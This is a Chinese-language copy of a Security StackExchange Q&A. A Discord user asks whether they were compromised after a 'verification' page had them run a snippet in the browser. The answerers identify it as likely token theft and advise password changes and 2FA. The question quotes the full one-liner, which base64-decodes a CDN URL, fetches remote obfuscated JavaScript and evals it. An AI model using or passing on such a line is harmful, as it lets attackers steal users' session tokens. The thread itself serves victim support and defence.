我试图在一个28k的用户服务器上验证我的意见不一致。验证通道引导我到这个页面,我按照步骤进行验证。

命令是这样的
javascript:fetch(atob('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNDUzNDg5ODAzNzU2MzQ2Ny8xMDE0NTM0OTg0MTc1OTg0NjQwL3VkdW1iLnR4dA==')).then(result => result.text()).then(result => eval(result));我有什么问题吗?我该怎么办?
发布于 2022-09-06 20:01:36
我还没有反向设计JS文件。但是一般来说,这种不和谐的攻击是通过诱使某人在浏览器中运行JS片段来窃取某些人的不和谐令牌/cookie来实现的。事实上,如果您在web浏览器中打开开发人员控制台,实际上,不和谐会显式地警告您输入JavaScript。我认为这种攻击不太可能做任何坏事,如下载恶意软件,但我建议您更改您的密码,刷新您的会话,并启用MFA,如果您还没有这样做。
发布于 2022-09-06 10:05:23
很难判断JavaScript到底做了什么。直接在站点上的脚本解析为https://cdn.discordapp.com/attachments/1014534898037563467/1014534984175984640/udumb.txt,这反过来是一个包含大约57k模糊JavaScript的.txt文件。
所以问题是“我到底有多糟?”很难回答,因为没有人能告诉你脚本到底是做什么的,除非他们投入相当长时间的反向工程。基于什么是likely...it,可能会为不和谐或其他流行服务窃取会话令牌。
最好的做法是检查任何可疑的“连接应用程序”,并更改您的所有密码。如果可以,启用2FA身份验证以防止不和谐,以限制攻击者所能做的事情。
https://security.stackexchange.com/questions/264613
复制相似问题